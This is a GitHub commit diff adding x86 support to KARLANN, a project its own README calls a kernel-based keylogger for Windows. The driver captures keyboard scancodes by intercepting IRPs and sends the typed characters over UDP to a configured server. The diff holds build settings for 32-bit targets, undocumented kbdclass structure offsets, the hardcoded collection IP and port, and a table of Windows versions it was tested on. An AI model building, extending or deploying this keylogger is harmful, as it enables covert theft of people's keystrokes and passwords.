x86 support

HARM4Y · Sep 18, 2022 · 20f8123 · 20f8123
1 parent e5adb67
commit 20f8123
Show file tree

Hide file tree

Showing 8 changed files with 36 additions and 9 deletions.
diff --git a/Karlann.sln → Poc.sln b/Karlann.sln → Poc.sln
@@ -8,11 +8,15 @@ EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		Release|x64 = Release|x64
+		Release|x86 = Release|x86
 	EndGlobalSection
 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
 		{486398F7-217E-4A58-91CE-08B7095C2472}.Release|x64.ActiveCfg = Release|x64
 		{486398F7-217E-4A58-91CE-08B7095C2472}.Release|x64.Build.0 = Release|x64
 		{486398F7-217E-4A58-91CE-08B7095C2472}.Release|x64.Deploy.0 = Release|x64
+		{486398F7-217E-4A58-91CE-08B7095C2472}.Release|x86.ActiveCfg = Release|Win32
+		{486398F7-217E-4A58-91CE-08B7095C2472}.Release|x86.Build.0 = Release|Win32
+		{486398F7-217E-4A58-91CE-08B7095C2472}.Release|x86.Deploy.0 = Release|Win32
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE

diff --git a/Poc.vcxproj b/Poc.vcxproj
@@ -26,24 +26,24 @@
     <Configuration>Debug</Configuration>
     <Platform Condition="'$(Platform)' == ''">Win32</Platform>
     <RootNamespace>Poc</RootNamespace>
+    <ProjectName>Poc</ProjectName>
   </PropertyGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <TargetVersion>Windows10</TargetVersion>
+    <TargetVersion>Windows7</TargetVersion>
     <UseDebugLibraries>false</UseDebugLibraries>
     <PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
     <ConfigurationType>Driver</ConfigurationType>
     <DriverType>KMDF</DriverType>
-    <DriverTargetPlatform>Universal</DriverTargetPlatform>
+    <DriverTargetPlatform>Desktop</DriverTargetPlatform>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <TargetVersion>
-    </TargetVersion>
+    <TargetVersion>Windows7</TargetVersion>
     <UseDebugLibraries>false</UseDebugLibraries>
     <PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
     <ConfigurationType>Driver</ConfigurationType>
     <DriverType>KMDF</DriverType>
-    <DriverTargetPlatform>Universal</DriverTargetPlatform>
+    <DriverTargetPlatform>Desktop</DriverTargetPlatform>
     <Driver_SpectreMitigation>Spectre</Driver_SpectreMitigation>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
@@ -76,6 +76,8 @@
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     <DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
     <Inf2CatUseLocalTime>true</Inf2CatUseLocalTime>
+    <IncludePath>$(IncludePath)</IncludePath>
+    <LibraryPath>$(LibraryPath)</LibraryPath>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
     <DebuggerFlavor>DbgengKernelDebugger</DebuggerFlavor>
@@ -86,10 +88,17 @@
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     <ClCompile>
       <BufferSecurityCheck>true</BufferSecurityCheck>
+      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
     </ClCompile>
     <Link>
       <EntryPointSymbol>FxDriverEntry</EntryPointSymbol>
-      <AdditionalLibraryDirectories>$(SolutionDir)libwsk</AdditionalLibraryDirectories>
+      <AdditionalDependencies>libwsk.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>$(SolutionDir)libwsk\x64;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Link>
+      <AdditionalLibraryDirectories>$(SolutionDir)libwsk\x86</AdditionalLibraryDirectories>
       <AdditionalDependencies>libwsk.lib;%(AdditionalDependencies)</AdditionalDependencies>
     </Link>
   </ItemDefinitionGroup>

diff --git a/README.md b/README.md
@@ -1,5 +1,5 @@
 # KARLANN
-## It's a kernel-based keylogger for Windows x64. <a href="https://github.com/hkx3upper/Karlann/wiki">English</a>  
+## It's a kernel-based keylogger for Windows x86/x64. <a href="https://github.com/hkx3upper/Karlann/wiki">English</a>  
 ## Foreword：
 **Karlann**是一个Windows内核键盘记录器，Poc驱动拦截Win32k发送到Kbdclass的IRP，获取键盘的Scancode，并通过UDP将Scancode转换成的字符发送到服务端。  
 ## Description：
@@ -19,6 +19,7 @@
 4.使用libwsk库(下方References)，把它的C++库做了一些调整，libwsk.h所有函数声明加前缀extern "C"后编译，
 实现了通过UDP传输键盘数据的功能。
 5.增加按键映射的功能，在Kbd.c->PocConfigureKeyMapping。
+6.支持Windows 7 x86 - Windows 10 x86。
 ```
 #### Undocumented struct（kbdclass.sys）：
 ```
@@ -28,7 +29,7 @@ DeviceExtension->ReadQueue（DeviceExtension + READ_QUEUE_OFFSET_DE）
 kbdclass!KeyboardClassDequeueRead（在驱动内实现）  
 ```
 ## Build & Installation：
-1.建议在Windows 7 x64 6.1（7601）SP1 - Windows 10 x64 21H1（19043.1889）环境运行  
+1.建议在Windows 7 x86/x64 6.1（7601）SP1 - Windows 10 x86/x64 21H1（19043.1889）环境运行  
 ```
 已测试系统版本:                  0903        0905        0906
 Windows 7  x64 6.1(7601) SP1			        PASS
@@ -40,8 +41,11 @@ Windows 10 x64 1703(15063.0)    PASS        PASS        NT
 Windows 10 x64 1709(16299.15)   PASS        PASS        PASS
 Windows 10 x64 1809(17763.2928) PASS        PASS        PASS
 Windows 10 x64 21H1(19043.1889) PASS        PASS        PASS
+
+Windows 7  x86 6.1(7601) SP1			        PASS
+Windows 10  x86 1909(18363.592)			        PASS
 ```
-2.修改global.h中的POC_IP_ADDRESS（SocketTest所在电脑的IP）和POC_UDP_PORT，使用Visual Studio 2019编译Release x64 Poc驱动  
+2.修改global.h中的POC_IP_ADDRESS（SocketTest所在电脑的IP）和POC_UDP_PORT，修改项目->属性->Driver Setting->Target OS Vserion为对应的版本，使用Visual Studio 2019编译Release x86/x64 Poc驱动  
 ```
 不能编译Debug驱动，IO_REMOVE_LOCK在Debug和Release下的定义不同
 ```

diff --git a/global.h b/global.h
@@ -21,10 +21,20 @@ extern POBJECT_TYPE* IoDriverObjectType;
 * kbdclass的DeviceExtension结构体某些项的偏移，
 * 虽然未导出，但这几个值的偏移从Windows 8 x64开始，都是不变的
 */
+#ifdef _WIN64
+
 #define REMOVE_LOCK_OFFET_DE            0x20
 #define SPIN_LOCK_OFFSET_DE             0xA0
 #define READ_QUEUE_OFFSET_DE            0xA8
 
+#else
+
+#define REMOVE_LOCK_OFFET_DE            0x10
+#define SPIN_LOCK_OFFSET_DE             0x6C
+#define READ_QUEUE_OFFSET_DE            0x70
+
+#endif
+
 #define POC_IP_ADDRESS                  L"192.168.10.107"
 #define POC_UDP_PORT                    L"10017"
 

diff --git a/libwsk/x64/libwsk.lib b/libwsk/x64/libwsk.lib
diff --git a/libwsk/x64/libwsk.pdb b/libwsk/x64/libwsk.pdb
diff --git a/libwsk/x86/libwsk.lib b/libwsk/x86/libwsk.lib
diff --git a/libwsk/x86/libwsk.pdb b/libwsk/x86/libwsk.pdb